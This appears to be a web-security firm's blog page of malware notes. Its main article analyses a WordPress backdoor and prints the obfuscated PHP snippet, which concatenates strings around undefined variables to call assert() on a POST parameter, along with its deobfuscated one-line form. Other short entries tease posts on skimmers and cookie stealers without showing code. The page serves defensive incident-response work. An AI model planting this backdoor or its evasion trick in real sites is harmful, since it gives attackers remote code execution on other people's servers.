Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

When investigating a compromised website, our team has to make sure that all malware and backdoors are cleared from the environment. In some instances, these backdoors are easier to detect than others, but that's not always the case.

Attackers have been using different techniques to avoid detection with automated scanners, such as abusing of PHP tricks and abusing of spaces. In this article, we'll uncover another simple yet powerful method to execute commands remotely (RCE) while going undetected by regular scanners.

This obfuscation technique consists of adding undefined variables with string concatenation in order to allow RCE via the use of a PHP function called assert(). The code was injected into the WordPress file “./wp-includes/Requests/Exception/HTTP/511.php”. Here is the snippet:

error_reporting(0); 
$k="a"."".$sdfds."ss"."e".$jieos.""."rt"; 
$k/*;*/(/*;*/$/*;*/{"_".""."P".$esdwos."O"."S".$wmdir."T"} ['Derrtreuu54ew5']);

Please note that except for $k, all the other variables ($sdfds, $esdwos, ..) were not initialized. This would implicate in the following PHP Notice if it wasn’t for the error_reporting(0); declaration.

[Tue May 30 13:02:48.226182 2017] [:error] [pid 31554] [client 192.168.1.1:48152] PHP Stack trace:
[Tue May 30 13:02:48.226185 2017] [:error] [pid 31554] [client 192.168.1.1:48152] PHP   1. {main}() /var/www/bd.php:0
[Tue May 30 13:02:48.226241 2017] [:error] [pid 31554] [client 192.168.1.1:48152] PHP Notice:  Undefined variable: esdwos in /var/www/bd.php on line 5

After cleaning up the undefined variables and concatenating the strings (which were there only as a evasion technique), we can clearly see the backdoor:

assert($_POST['Derrtreuu54ew5']);

This snippet allows attackers to execute remote commands on the compromised website by sending a crafted $_POST request through the variable “Derrtreuu54ew5”.

As the malicious code was injected into the core WordPress structure (./wp-includes/…), a File Integrity Monitoring System would be able to quickly report these issues to the website owner and give them the chance in reducing damages to their online presence and SEO. Having regular backups of your files/database is also a great security measure to lessen the impacts of a compromise.

If you want to make sure your website is clean of backdoors that could be the entry point for infections and reinfections, let us know.

During our malware research role, we analyze hundreds (if not thousands) of malware samples every day. Quite often, highly-obfuscated techniques are used by attackers to avoid detection and maintain access to the compromised environment for as long as possible.

Read More ...

There are many ways to develop a backdoor and virtually all of them share a similar goal - not to be discovered. To achieve that, some attackers are giving up on using $_POST and $_GET variables, obfuscation techniques, etc, and playing with $_COOKIE’s to execute their code remotely.

Read More ...

When a website is compromised, one of the most interesting and challenging tasks we perform is identifying all malware to prevent attackers from regaining access to the resource. They may use different type of malicious codes and techniques depending on their final objectives.

Read More ...

We’ve already described several times how credit card stealing malware hides a data collecting script behind an image URL. When people see URLs that end with .jpg, .png, or .gif they normally don’t expect them to do anything malicious. Third-party JavaScripts are much more suspicious, still it is possible to use them in a way to coax webmasters into considering them benign.

When checking yet another credit card stealing JavaScript injected into the /js/ccard.js file in Magento, we noticed this line:

Read More ...

Cookies are an important part of a visiting session on a website. It is used not only to keep track of actions taken on a specific website by a particular user, but also its login sessions. Having those cookies stolen can easily lead to a compromise of any admin area you visit and allow the attacker to know what you did on that specific website.

These types of attack (Cookie Stealing and Session Hijacking) are not the most common ones due to the complexity involved in the process and because they are usually time sensitive (cookie expiration).

During an incident response investigation, we found a Cookie Stealing malware pretending to be working with one of WordPress’s core domains. Hackers injected an obfuscated (typical eval(function(p,a,c,k,e,d) obfuscation) JavaScript code at the bottom of legitimate .js files such as wp-includes/js/hoverIntent.min.js. Once decoded we see the following:

Read More ...

Some attackers seem to like signing their scripts. This fact is especially true for defacements and backdoors, where attackers show their pride stating that they “owned” a site by signing their own malware. Sometimes they write their expressions and nicknames on the title or in the middle of the file:

Read More ...

Recently we’ve seen some WordPress websites displaying unwanted banners at the bottom of the page which appear 15 seconds after browsing the website. Those banners are being generated due to the following code being injected into the theme’s function.php files:

Read More ...

Attackers tend to get smarter in order to avoid detection, as well as gain access to your WordPress site. They use legit functions of the WordPress core to create users, post spammy content, and other kinds of malicious activities.

Read More ...